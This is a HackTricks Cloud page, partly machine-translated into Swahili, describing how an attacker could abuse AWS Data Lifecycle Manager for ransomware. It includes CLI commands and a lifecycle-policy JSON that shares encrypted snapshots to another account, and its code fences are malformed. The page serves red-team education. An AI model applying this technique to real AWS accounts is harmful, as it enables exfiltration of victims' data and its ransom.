Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - DLM Post Exploitation

Support HackTricks

Meneja wa Mzunguko wa Data (DLM)

EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy

Shambulio la ransomware linaweza kutekelezwa kwa kuchipua kadri EBS volumes iwezekanavyo kisha kufuta sasa EC2 instances, EBS volumes, na snapshots. Ili kiotomatiki shughuli hii ya uovu, mtu anaweza kutumia Amazon DLM, kuchipua snapshots na kioo cha KMS kutoka akaunti nyingine ya AWS na kuhamisha snapshots zilizochipuliwa kwenda akaunti tofauti. Vinginevyo, wanaweza kuhamisha snapshots bila kuchipua kwenda kwenye akaunti wanayosimamia na kisha kuzichipua hapo. Ingawa si rahisi kuchipua EBS volumes au snapshots zilizopo moja kwa moja, inawezekana kufanya hivyo kwa kuunda volume au snapshot mpya.

Kwanza, mtu atatumia amri kukusanya habari kuhusu volumes, kama vile kitambulisho cha kifaa, kitambulisho cha volume, hali ya kuchipua, hali ya kiambatisho, na aina ya volume. aws ec2 describe-volumes

Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.

```sw
aws dlm create-lifecycle-policy --description "Sera yangu ya kwanza" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json

A template for the policy document can be seen here:
```bash
```json
{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}

<div data-gb-custom-block data-tag="hint" data-style='success'>

Learn & practice AWS Hacking:<img src="/.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

</div>
PreviousAWS - Control Tower Post ExploitationNextAWS - DynamoDB Post Exploitation

Last updated